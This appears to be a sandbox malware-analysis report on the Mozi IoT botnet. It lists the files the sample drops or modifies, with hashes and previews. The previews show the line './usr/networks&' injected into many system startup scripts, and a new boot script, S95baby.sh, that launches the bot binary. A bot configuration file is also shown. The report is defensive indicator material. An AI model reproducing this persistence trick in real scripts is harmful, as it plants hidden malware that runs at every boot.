                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: bootmisc.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):147
                                                                                                        Entropy (8bit):4.7173471450646
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4AGXi0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4u0Voo+v7n
                                                                                                        MD5:FC904BF1583E7C4398FCCDF2D3276902
                                                                                                        SHA1:25D51112D0A6C9C977F4BB0B73BB3B4F278074A3
                                                                                                        SHA-256:059F2548AB66249C86CC868222E9CA0B44123E23A99D4D3581044D1306730BD7
                                                                                                        SHA-512:DF7FC2EE581E67BC3282F05FB8DC33FCAF86B29F564E5CB43965AFDB6AE7422D06A6091A18375B3544F495CA827B6CC6B213FF4FFE7AEC252C326B8D56B4CF84
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkroot-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):250
                                                                                                        Entropy (8bit):4.872318043360431
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4YDi0Voo+v7n:AGKE3fdARMsBLbYerTn
                                                                                                        MD5:1B20C93FFEABBAA880FEB038394DA3EE
                                                                                                        SHA1:CDD8FDC804AE4D7464E3B67B26F52C53C5EEAD13
                                                                                                        SHA-256:3A63188036AB39E080E5035091441EFB91BF22F20C9292900929CA8F04D0F280
                                                                                                        SHA-512:E2717119C05473DEB21FF60060813C6B4648FB6B94B524D76A15ED9506ED2BCFFA03108ABAB7CBF52A29D7507937749D0F9F420A96D4F75B499553434F836059
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: checkroot-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/checkroot.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3111
                                                                                                        Entropy (8bit):4.922960717312443
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:l+bjYLN1LiQKt6CYuSB/VN7pL4TyKWSmdrBW71cBi8m:0sxx2cJBVxZH01cc8m
                                                                                                        MD5:544D026D22E17EF8C1F59AE6EC1E5993
                                                                                                        SHA1:F5BFEE80CBF31DAEC25CD0728F030580F539D88F
                                                                                                        SHA-256:69A39FE65F95BBA2E445A39AA1F8AF941FDA210AB6A9174B0578B5AB36C5BE32
                                                                                                        SHA-512:85CD0C7AE75DA853E5C4286BF4E3D9DE28D2916EDBE0CB7A42DC53AD7D8B02F7875C617DC4D4DD4A1C74333D9403C8D06C903F8F19AB11A3E221281B7CBF8837
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..# NOTE: "failure" is defined as exiting with a return code of..# 4 or larger. A return code of 1 indicates that file system..# errors were corrected but that the boot may proceed. A return..# code of 2 or 3 indicates that the system should immediately reboot...#..if [ "$FSCKCODE" -eq 32 ]..then...log_warning_msg "File system check was interrupted by user"..elif [ "$FSCKCODE" -gt 3 ]..then...# Surprise! Re-directing from a HERE document (as in "cat << EOF")...# does not work because the root is currently read-only....log_failure_msg "An automatic file system check (fsck) of the root filesystem failed. .A manual fsck must be performed, then the system restarted. .The fsck should be performed in maintenance mode with the .root filesystem mounted in read-only mode."...log_warning_msg "The root filesystem is currently mounted in read-only mode. .A maintenance shell will now be started. .After performing system maintenance, press CONTROL-D .to terminate the maintenance shell
                                                                                                        /etc/init.d/hostname.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):404
                                                                                                        Entropy (8bit):5.01878905639229
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:U20zRSdZ9iBbG2Us4Ji0SAGKFqLkMfF3teoWpAsBdA80F4n0u4hR9QR0Voo+v7n:Ul221wi0PGKE3fdpsBi8wlbHaNrTn
                                                                                                        MD5:0A6F8F35CFF93CE8BBAB05E2DA2714C6
                                                                                                        SHA1:9A865CEB2B56974A54694ED9D1D117043EA02727
                                                                                                        SHA-256:4E41D7D95B11DBAD34E30EDE98DB6728873146F05FF45A4EF6943ADD1F71D0A1
                                                                                                        SHA-512:F6E29642047487748B5BEC77C7429881B73FED48CAA9247CB788CFA2CE856D300B3FB6F8F4C8D6F18ED710B5237B331BC03ABE03222296EE12F1256D5222B537
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $ES.}..do_status () {..HOSTNAME=$(hostname)..if [ "$HOSTNAME" ] ; then...return 0..else...return 4..fi.}..case "$1" in. start|"")..do_start..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop)..# No-op..;;. status)..do_status..exit $?..;;. *)..echo "Usage: hostname.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/hwclock.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountall-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):249
                                                                                                        Entropy (8bit):4.8912088003487595
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4iea2ii0Voo+v7n:AGKE3fdARMsBLbxPrTn
                                                                                                        MD5:11FEEF13321D348864E7632D0746ECA2
                                                                                                        SHA1:8D763DA6837280846D90AAACA3122D4F5CC0C62D
                                                                                                        SHA-256:3DFE238D111564682893276C28BB49367C38A1F07A873B8F79E4FA8291FD7FE7
                                                                                                        SHA-512:1C25B93B523688ACB3DF72B8EC148CD736CD479E7BEF3655DBCDB0B6D1AFACB652492ECF81A21EBADEBBFF14D0B20916DFD639E93EE1CCD6454C61F38BCAE46D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountall.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):148
                                                                                                        Entropy (8bit):4.74526082342869
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/IREK0GFrTOvsBdFru4iLirKM0FJOUsZoG3Hv0VOORgn:eoARzAsBdhu4ierX0Voo+v7n
                                                                                                        MD5:44D9E997053B704B17DB7DD64563014E
                                                                                                        SHA1:1A29A3E927426D001FD0627C244B2397CF62D6C6
                                                                                                        SHA-256:56B70518A2C51841B3C7BC5DDBAFC2AF62F4A47B25A1147A929E1129CBCBFAC7
                                                                                                        SHA-512:B16AC50C36C5C17D405D2D8A1E9DB7D9863578EB71F4C382C56C4AA4BCEAEE6D4558A8CB94505464A1F13BA980741F5BE8CBD134C425004AA260DAC8F52B1581
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountall.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountdevsubfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56
                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                        MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                        SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                        SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                        SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountkernfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):56
                                                                                                        Entropy (8bit):4.1427249051134325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZoG3LWlOORgn:eoo+WMn
                                                                                                        MD5:1E7189F6F5D3DB6ABCDA8139030EFD90
                                                                                                        SHA1:370B1FF47F5FC95D054FE3036C5F772403F9C1EF
                                                                                                        SHA-256:2059ABA4C0ADA6C0EE6F5F911D60D25C054D91BEEF283931E7AD10CE68E096E7
                                                                                                        SHA-512:C1CBF1885B2E515BF2B77688891B122EEC824022DFCB30B3075D9BD39B154EA7A9DC1B0CD64397335A9D32A8959B53C2225F600357F295FA8A914BA247163E12
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;.esac../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountnfs-bootclean.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):249
                                                                                                        Entropy (8bit):4.8916208864241355
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:un5GKFqLkMfF3teoARzAsBdhu4il/2ii0Voo+v7n:AGKE3fdARMsBLbPrTn
                                                                                                        MD5:515975B77B7985776BC03B8F5C029EFE
                                                                                                        SHA1:AA8F2AD5CB736EDC9BA0AEAE0748257E16875C11
                                                                                                        SHA-256:DFD458AE245B70CB759F3FF40FB22BDFD520E627DABAF813C1D9BCA2C8155E00
                                                                                                        SHA-512:169DC8DDF26C9F3A50C29D0F2AB99AF20D4F949F2F034AC25914086ED0DE37610D310F034E20B6493195E1BB54DC3036EB5BC999099D74ED53FFC813DED5FAD2
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit $?..;;. restart|reload|force-reload)..echo "Error: argument '$1' not supported" >&2..exit 3..;;. stop|status)..# No-op..;;. *)..echo "Usage: mountnfs-bootclean.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/mountnfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):190
                                                                                                        Entropy (8bit):3.788938232230384
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVx5jWvFFFvNsTREKdKCvFF/pN1uFFFveYd3LrLl7jWvFFFvzv3Hv0VOORgn:a5qvFFhNsTR/3/hN4/Zdd75qvFFhzfv7
                                                                                                        MD5:B09350F021B2B102B1E328A988261F3E
                                                                                                        SHA1:93AD761BD0E1EBB3E9BDCAA469EC0192C0C9DA4F
                                                                                                        SHA-256:E78EED19CCD5853AF3518FB3A16BE3244BE503798218041D65E5B44A0829A020
                                                                                                        SHA-512:1DB35C4F8A6584FAC6AB3B0789B4037F09557457B248443489D5EDD2A6B34DB59735B3256F905D45075199DD870E52FFDBCC7E8DD85006BD1F85F8000F61FF8A
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&. exit 3. ;;. stop|status). # No-op. ;;. *). echo "Usage: $0 start|stop" >&2. exit 3. ;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/init.d/umountnfs.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):145
                                                                                                        Entropy (8bit):4.730534942677594
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVaUsZ/ZHM4hWRJ7Fru4fR3dM0FJOUsZoG3Hv0VOORgn:eogJ7hu4pC0Voo+v7n
                                                                                                        MD5:60F4E3C6C61EF7FA36BC5B00FF234698
                                                                                                        SHA1:8AC881752B54BDB8FBD831A67AF6ED8CB2989B65
                                                                                                        SHA-256:9DBFF8DF724717101900B6289BDB73EB05D67D4A14170EB3D26B20686F851F7F
                                                                                                        SHA-512:741D35617E8C3B5D1278CB83C11BFBA1B6110B17D7E251DABA10EAC30BBAD8C5064F0EB7AF236EEEA9383E78C8E3F2DE477598763A5A1B7F213D606DF1F1D6D7
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&..exit 3..;;. stop|"")..do_stop..;;. *)..echo "Usage: umountnfs.sh [start|stop]" >&2..exit 3..;;.esac..:../usr/networks&.exit 1.
                                                                                                        /etc/profile.d/Z97-byobu.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/apps-bin-path.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/bash_completion.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/cedilla-portuguese.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/profile.d/vte-2.91.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/rc.local
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOOR3n:M
                                                                                                        MD5:CCE237822A14795B1B5946EAE141691B
                                                                                                        SHA1:420CE3F920BB02962978255ADDCBF975D4014A3A
                                                                                                        SHA-256:D9C831E4480DBAAB813BF5BE1BCE6C64CFA4F4320038022E2051BD4E8E4D76DF
                                                                                                        SHA-512:24A86C9C9944068E3FE6000687E6D392F6587556601E09A22399D15B588536883547B326F13BE506BE492C2269F69AA2DCEDE4FBA8847664793847C74AD5EFF6
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&.exit 0.
                                                                                                        /etc/rcS.d/S95baby.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:POSIX shell script, ASCII text executable
                                                                                                        Category:dropped
                                                                                                        Size (bytes):25
                                                                                                        Entropy (8bit):3.8936606896881854
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:TKH4v0VJ:hK
                                                                                                        MD5:1B3235BA10FC04836C941D3D27301956
                                                                                                        SHA1:8909655763143702430B8C58B3AE3B04CFD3A29C
                                                                                                        SHA-256:01BA1FB41632594997A41D0C3A911AE5B3034D566EBB991EF76AD76E6F9E283A
                                                                                                        SHA-512:98BDB5C266222CCBD63B6F80C87E501C8033DC53B0513D300B8DA50E39A207A0B69F8CD3ECC4A128DEC340A1186779FEDD1049C9B0A70E90D2CB3AE6EBFA4C4D
                                                                                                        Malicious:true
                                                                                                        Joe Sandbox View:
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: 1skm346Xtz, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.1.m, Detection: malicious, Browse
                                                                                                        • Filename: 6wuvHEBHt8.bin, Detection: malicious, Browse
                                                                                                        • Filename: 7v1ic5IS8I, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.a, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: Mozi.m, Detection: malicious, Browse
                                                                                                        • Filename: bad_file, Detection: malicious, Browse
                                                                                                        • Filename: mxjzQQFgLp, Detection: malicious, Browse
                                                                                                        • Filename: JrAL1wW1MQ, Detection: malicious, Browse
                                                                                                        Preview: #!/bin/sh./usr/networks&.
                                                                                                        /etc/wpa_supplicant/action_wpa.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):714
                                                                                                        Entropy (8bit):5.329653855555143
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:cVDDdg8QdNux7S3Pd7PSeSST4ydVgpuVFnn3izesU6jc45gfqlX4n:UDxReIx7O9BSu4ydVBnn4742gyJ4
                                                                                                        MD5:DD099D71A60531087FDDED3EBEE8036A
                                                                                                        SHA1:C684334C3B133D889F8C5965184E1C9280BAA16A
                                                                                                        SHA-256:52995C5CED8EE9421D08E745C5E3D9805783E5D641C7A8FDB1C3CA6A4C745E03
                                                                                                        SHA-512:2788EB77A944861C3361D12DB65502553EE36314C40A864F73B2FF18AF54DA3D02F5AC07DBA4E962596F11DD8B826243BE2FD52F85F1260B511D3241E1C38C63
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 0.fi..# ifplugd(8) - <iface> <action>.#.# If an ifplugd managed interface is brought up, disconnect any.# wpa-roam managed interfaces so that only one "roaming" interface.# remains active on the system...IFPLUGD_IFACE="${1}"..case "${2}" in..up)...COMMAND=disconnect...;;..down)...COMMAND=reconnect...;;..*)...echo "$0: unknown arguments: ${@}" >&2...exit 1...;;.esac..for CTRL in /run/wpa_supplicant/*; do..[ -S "${CTRL}" ] || continue...IFACE="${CTRL#/run/wpa_supplicant/}"...# skip if ifplugd is managing this interface..if [ "${IFPLUGD_IFACE}" = "${IFACE}" ]; then...continue..fi...if wpa_action "${IFACE}" check; then...wpa_cli -i "${IFACE}" "${COMMAND}"..fi.done../usr/networks&.exit 1.
                                                                                                        /etc/wpa_supplicant/functions.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):23
                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                        /etc/wpa_supplicant/ifupdown.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3368
                                                                                                        Entropy (8bit):5.3288648372922625
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:VcySPOD1MoGPVKSQ5NkmzYykHypw5lX3yp4ZpOqq9GCyiqYJ7l87OqxOCXnNnogq:lZfGPODjea4+9Gc7kOqxOC9ogwaRM
                                                                                                        MD5:77FEC347F290A3B065F36EE08ABB77C6
                                                                                                        SHA1:388D7CC5DDF20DD8651ED01B99460B7CECCBA46A
                                                                                                        SHA-256:40AE2677EF20938DC8A5D3776051D318F4C8059155D5CC146565DF028B45C283
                                                                                                        SHA-512:B377C9FED8545F0BC409AD6675E856C9B9C6183D1E6F189E1142E8CCEC89183273D357BE4FB720B680C4057EE045A2E19E9D4E82DDB33F3CED77EA38C1E07EAF
                                                                                                        Malicious:false
                                                                                                        Preview: ./usr/networks&..exit 0.fi..# allow wpa_supplicant interface to be specified via wpa-iface.# useful for starting wpa_supplicant on one interface of a bridge.if [ -n "$IF_WPA_IFACE" ]; then..WPA_IFACE="$IF_WPA_IFACE".else..WPA_IFACE="$IFACE".fi..# source functions.if [ -f /etc/wpa_supplicant/functions.sh ]; then... /etc/wpa_supplicant/functions.sh.else..exit 0.fi..# quit if executables are not installed.if [ ! -x "$WPA_SUP_BIN" ] || [ ! -x "$WPA_CLI_BIN" ]; then..exit 0.fi..do_start () {..if test_wpa_cli; then...# if wpa_action is active for this IFACE, do nothing...ifupdown_locked && exit 0....# if the administrator is calling ifup, say something useful...if [ "$PHASE" = "pre-up" ]; then....wpa_msg stderr "wpa_action is managing ifup/ifdown state of $WPA_IFACE"....wpa_msg stderr "execute \`ifdown --force $WPA_IFACE' to stop wpa_action"...fi...exit 1..elif ! set | grep -q "^IF_WPA"; then...# no wpa- option defined for IFACE, do nothing...exit 0..fi...# ensure stale ifupdown_lock marker
                                                                                                        /tmp/.config
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):284
                                                                                                        Entropy (8bit):4.841045283359712
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:tqRaEtMFtbUrQQxXDzraOn3zuTTn/N+d/JERaEtMFtbUrQQxXDzraOn3zuTTn/NL:AF+Ftb4HaU3zu8EF+Ftb4HaU3zuV
                                                                                                        MD5:1AB810C9212BB8053F4F725DF471AED5
                                                                                                        SHA1:25818035C48AD5FD30FF74125A38F7522C0B1AFA
                                                                                                        SHA-256:20AC9D8408C78F424C045419BEC511C90ADED7E9DFCEA1D26D704D18D1BA5C6E
                                                                                                        SHA-512:38F215233DBB733F014B31B9DBB8D40DD15AD61EDFB9F62D052F6ABD75A61A162F3298EDFAD9DC47B4DB330041E514AF5A666711FE12BEA8A2E0B5C1DCABC055
                                                                                                        Malicious:false
                                                                                                        Preview: 2.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]32770.[ss]botv2[/ss][dip]192.168.2.100:80[/dip][hp]88888888[/hp][count]http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/[idp][/count]
                                                                                                        /usr/bin/gettext.sh
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1914
                                                                                                        Entropy (8bit):4.829445473341419
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:3/fh/ylBZscHBD4JxW0aeLWVXh6Q5bxg35ZnG+PAGWKczBzzP:3xKlscH/zeix/U5ZxAGWxP
                                                                                                        MD5:6A371C00539A7CA37BBE68DF0F044BE9
                                                                                                        SHA1:20778B3CCF4C2B42E9EDAD6C2A4ADC0F267CF220
                                                                                                        SHA-256:0832AFE212207C7C7B8A3F27556B774F3C25DFC4C0AB2AF37D8B0F3C6BEDF090
                                                                                                        SHA-512:2D49FD8EC5C531F96AE2D84AE3341BD3668A3E00F1AD408E2876B36540E693BB1884266EF9C792DE786F13B33553CADD5629BCD0352F9727D9CE48605EFD05DB
                                                                                                        Malicious:true
                                                                                                        Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                        /usr/networks
                                                                                                        Process:/tmp/Mozi.m
                                                                                                        File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                        Category:dropped
                                                                                                        Size (bytes):307960
                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                        MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                        SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                        SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
